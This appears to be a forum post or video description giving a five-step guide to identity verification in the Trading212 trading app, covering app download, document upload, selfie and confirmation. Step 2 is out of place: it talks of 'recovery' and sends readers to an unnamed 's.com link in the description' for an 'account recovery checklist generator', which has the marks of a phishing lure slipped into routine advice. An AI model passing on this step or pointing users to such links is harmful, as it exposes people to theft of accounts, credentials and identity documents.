I ran into this last week. Here's what fixed it for me. Verifying your identity on Trading212 can seem tricky, but it is actually straightforward if you follow these steps. Step 1. Download the Trading212 app. Start by downloading the Trading212 app from the App Store or Google Play. Once installed, open the app and create your account if you haven't already. Step 2. Navigate to verification. Before starting recovery, use the s.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Upload required documents. You will need to upload a government-issued ID like a passport or driver's license and a proof of address like a utility bill. Make sure the documents are clear and legible. Step 4. Take a selfie. The app will prompt you to take a selfie for facial recognition. Ensure you are in a well-lit area and that your face is clearly visible. This step is crucial for verifying your identity. Quick gotcha: if your selfie is too dark or blurry, it may be rejected, so double-check your lighting. Step 5. Wait for confirmation. After submitting your documents and selfie, you'll receive a confirmation email once your identity is verified. This can take a few minutes to a couple of days, so be patient. I hope this guide helps you navigate the verification process smoothly. If you have any questions, feel free to ask.